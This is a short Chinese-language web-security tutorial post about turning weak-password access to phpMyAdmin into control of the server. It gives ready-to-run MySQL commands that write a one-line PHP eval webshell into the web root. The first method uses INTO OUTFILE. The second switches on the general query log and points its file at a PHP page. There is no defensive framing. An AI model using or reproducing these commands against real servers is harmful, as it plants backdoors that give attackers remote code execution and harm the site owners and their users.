【Web安全】拿到phpMyAdmin如何获取权限

文章目录

通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

mysql 复制代码
select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

如果执行失败show variables like "%secure%"; 查看配置

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

set global general_log_file="网站绝对路径/文件名";
mysql 复制代码
SELECT "<?php @eval($_POST[1])?>"

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

相关推荐
叶羽西1 小时前
Android Studio IDE环境配置
android·ide·android studio
发飙的蜗牛'2 小时前
23种设计模式
android·java·设计模式
toto4128 小时前
线程安全与线程不安全
java·开发语言·安全
花追雨11 小时前
Android -- 双屏异显之方法一
android·双屏异显
小趴菜822711 小时前
安卓 自定义矢量图片控件 - 支持属性修改矢量图路径颜色
android
follycat11 小时前
bestphp‘s revenge
学习·web安全
氤氲息11 小时前
Android v4和v7冲突
android
KdanMin11 小时前
高通Android 12 Launcher应用名称太长显示完整
android
chenjk411 小时前
Android不可擦除分区写文件恢复出厂设置,无法读写问题
android
袁震11 小时前
Android-Glide缓存机制
android·缓存·移动开发·glide